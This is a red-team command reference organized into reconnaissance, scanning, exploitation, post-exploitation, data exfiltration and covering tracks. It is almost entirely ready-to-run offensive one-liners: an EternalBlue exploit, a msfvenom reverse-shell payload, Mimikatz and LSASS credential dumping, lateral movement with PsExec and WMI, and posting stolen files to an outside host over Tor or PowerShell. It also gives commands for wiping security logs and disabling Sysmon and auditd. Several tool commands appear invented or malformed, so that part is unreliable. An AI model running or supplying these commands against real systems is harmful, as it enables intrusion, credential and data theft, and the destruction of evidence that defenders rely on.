Red Team Guide

This page is a comprehensive reference tool for Red Teamers. It provides a detailed roadmap with 20+ tools and commands per category, organized into the following sections:

1. Reconnaissance and Enumeration: Identify and gather information about the target.
2. Vulnerability Scanning: Detect vulnerabilities in services and systems.
3. Exploitation: Exploit vulnerabilities to gain initial access.
4. Post-Exploitation: Maintain access, escalate privileges, and move laterally.
5. Data Exfiltration: Stealthily extract sensitive data.
6. Covering Tracks: Remove evidence and cover tracks to avoid detection.

Each category includes a clear description and practical examples of commands and tools, ready to use in penetration testing and Red Team operations.

1. Reconnaissance and Enumeration

Identify and gather information about the target, such as domains, subdomains, IP addresses, exposed services, and potential attack vectors.

Nmap

nmap -sV -sC -oA scan_result 192.168.1.1

Recon-ng

recon-ng -m recon/domains-hosts/brute_hosts

Amass

amass enum -d example.com

Sublist3r

sublist3r -d example.com

Shodan

shodan host 192.168.1.1

theHarvester

theHarvester -d example.com -b all

DNSenum

dnsenum example.com

Masscan

masscan 192.168.1.1 -p1-65535 --rate=1000

Whois

whois example.com

Dig

dig example.com ANY

Netdiscover

netdiscover -i eth0 -r 192.168.1.0/24

Fierce

fierce -dns example.com

Maltego

maltego

SpiderFoot

spiderfoot -l

Aquatone

aquatone-discover -d example.com

Assetfinder

assetfinder example.com

Findomain

findomain -t example.com

Knockpy

knockpy example.com

Httprobe

httprobe < domains.txt

Waybackurls

waybackurls example.com

2. Vulnerability Scanning

Identify vulnerabilities in exposed services and systems.

Nessus

nessuscli scan --target 192.168.1.1

OpenVAS

openvas-cli --target 192.168.1.1

Nikto

nikto -h http://example.com

OWASP ZAP

zap-cli quick-scan -o -r http://example.com

Burp Suite

burpsuite

Wapiti

wapiti -u http://example.com

WPScan

wpscan --url http://example.com

SQLMap

sqlmap -u http://example.com/page?id=1 --dbs

XSStrike

xsstrike -u http://example.com

Dirb

dirb http://example.com

Gobuster

gobuster dir -u http://example.com -w wordlist.txt

Nuclei

nuclei -u http://example.com

Retire.js

retire --path /var/www/html

Lynis

lynis audit system

Skipfish

skipfish -o output http://example.com

Arachni

arachni http://example.com

Vega

vega

Acunetix

acunetix

Netsparker

netsparker

3. Exploitation

Exploit identified vulnerabilities to gain initial access.

Metasploit

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit

SQLMap

sqlmap -u http://example.com/page?id=1 --dbs

CrackMapExec

crackmapexec smb 192.168.1.1 -u admin -p password

Hydra

hydra -l admin -P passwords.txt ssh://192.168.1.1

John the Ripper

john --wordlist=passwords.txt hash.txt

Hashcat

hashcat -m 1000 hash.txt passwords.txt

Responder

responder -I eth0

Impacket

python3 smbclient.py admin:password@192.168.1.1

Empire

powershell-empire

Cobalt Strike

teamserver 192.168.1.1 password

BeEF

beef

Social-Engineer Toolkit (SET)

setoolkit

ExploitDB

searchsploit apache 2.4.29

Msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o payload.exe

Veil-Evasion

veil-evasion

Shellter

shellter

PowerSploit

Invoke-Mimikatz -DumpCreds

Mimikatz

mimikatz.exe privilege::debug sekurlsa::logonpasswords

BloodHound

bloodhound-python -d example.com -u user -p password

4. Post-Exploitation

Maintain access, escalate privileges, and move laterally within the network.

Mimikatz

mimikatz.exe privilege::debug sekurlsa::logonpasswords

PowerSploit

Invoke-Mimikatz -DumpCreds

BloodHound

bloodhound-python -d example.com -u user -p password

Empire

powershell-empire

Cobalt Strike

teamserver 192.168.1.1 password

Metasploit

meterpreter > getuid

PsExec

psexec \\192.168.1.1 -u admin -p password cmd.exe

WMI

wmic /node:192.168.1.1 process call create "cmd.exe"

Impacket

python3 psexec.py admin:password@192.168.1.1

Netcat

nc -lvp 4444

SSH

ssh user@192.168.1.1

RDP

xfreerdp /u:admin /p:password /v:192.168.1.1

Procdump

procdump.exe -ma lsass.exe lsass.dmp

Mimikatz (Offline)

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

LaZagne

laZagne.exe all

Windows Credential Editor (WCE)

wce.exe -w

Meterpreter

meterpreter > hashdump

PowerUp

Invoke-AllChecks

PrivescCheck

Invoke-PrivescCheck -Extended

5. Data Exfiltration

Extract sensitive data from the target stealthily.

DNSCAT2

dnscat2-server --secret=mysecret

Netcat

nc -lvp 4444 > file.txt

Rclone

rclone copy sensitive_data remote:backup

SCP

scp user@192.168.1.1:/path/to/file .

SFTP

sftp user@192.168.1.1

HTTP

python3 -m http.server 8080

FTP

ftp 192.168.1.1

ICMP

icmp-exfil -i eth0 -f file.txt

DNS

dns-exfil -d example.com -f file.txt

Email

sendemail -f from@example.com -t to@example.com -u "Subject" -m "Body" -a file.txt

Cloud Storage

aws s3 cp file.txt s3://mybucket/

Tor

torsocks curl -X POST -d @file.txt http://example.com

WebDAV

cadaver http://example.com/webdav

SSH Tunnel

ssh -L 8080:localhost:80 user@192.168.1.1

Metasploit

meterpreter > download file.txt

PowerShell

Invoke-WebRequest -Uri http://example.com -Method POST -Body (Get-Content file.txt)

Base64

base64 file.txt

Steganography

steghide embed -cf image.jpg -ef file.txt

Zip

zip -r archive.zip file.txt

Encryption

openssl enc -aes-256-cbc -salt -in file.txt -out file.enc

6. Covering Tracks

Remove evidence of the attack and cover tracks to avoid detection.

Timestomp

timestomp file.txt -m "01/01/2023 00:00:00"

CCleaner

ccleaner.exe /AUTO

BleachBit

bleachbit

Shred

shred -u file.txt

Rm

rm -rf file.txt

Event Viewer

wevtutil cl Security

Log Deletion

del /f /q C:\Windows\System32\LogFiles\*.*

IIS Logs

del /f /q C:\inetpub\logs\LogFiles\*.*

Apache Logs

rm -rf /var/log/apache2/*

Nginx Logs

rm -rf /var/log/nginx/*

Sysmon

sysmon -u

Auditd

auditctl -D

Firewall

netsh advfirewall reset

Registry

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor

Task Scheduler

schtasks /delete /tn "Backdoor"

SSH

rm -rf ~/.ssh/known_hosts

Bash History

history -c

PowerShell History

Clear-History

Metasploit

meterpreter > clearev